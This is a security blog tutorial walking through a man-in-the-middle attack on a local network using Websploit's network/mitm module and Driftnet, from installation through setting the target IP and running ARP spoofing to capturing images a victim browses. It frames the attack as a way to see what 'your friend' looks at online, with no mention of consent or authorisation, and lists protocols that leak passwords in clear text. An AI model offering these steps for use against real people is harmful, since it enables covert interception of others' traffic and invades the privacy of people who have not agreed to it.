Monday, March 4, 2024

Driftnet – Tool used to Capture Images that Your Friend looking at Online

How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in Kali if not present.

root@kali:~# apt-get install websploit

Step2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules

Driftnet - Tool used to capture images

Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Driftnet - Tool used to capture images

Interface: Need to specify the network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.

Driftnet - Tool used to capture images

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.

wsf:MITM > run

Driftnet - Tool used to capture images

Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.

Driftnet - Tool used to capture images

Here you can find the pictures that your friend watching online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Website

Latest articles

US Court Orders NSO Group to Handover Code for Spyware, Pegasus to WhatsApp

Meta, the company that owns WhatsApp, filed a lawsuit against NSO Group in 2019....

New SSO-Based Phishing Attack Trick Users into Sharing Login Credentials  

Threat actors employ phishing scams to trick individuals into giving away important details like...

U.S. Charged Iranian Hacker, Rewards up to $10 Million

The United States Department of Justice (DoJ) has charged an Iranian national, Alireza Shafie...

Huge Surge in Ransomware-as-a-Service Attacks targeting Middle East & Africa

The Middle East and Africa (MEA) region has witnessed a surge in ransomware-as-a-service (RaaS)...

New Silver SAML Attack Let Attackers Forge Any SAML Response To Entra ID

SolarWinds cyberattack was one of the largest attacks of the century in which attackers...

AI Worm Developed by Researchers Spreads Automatically Between AI Agents

Researchers have developed what they claim to be one of the first generative AI...

20 Million+ Cutout.Pro User Records Leaked On Hacking Forums

CutOut.Pro, an AI-powered photo and video editing platform, has reportedly suffered a data breach,...
Guru baran
Guru baranhttps://gbhackers.com
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Live Account Takeover Attack Simulation

Live Account Take Over Attack

Live Webinar on How do hackers bypass 2FA ,Detecting ATO attacks, A demo of credential stuffing, brute force and session jacking-based ATO attacks, Identifying attacks with behaviour-based analysis and Building custom protection for applications and APIs.

Related Articles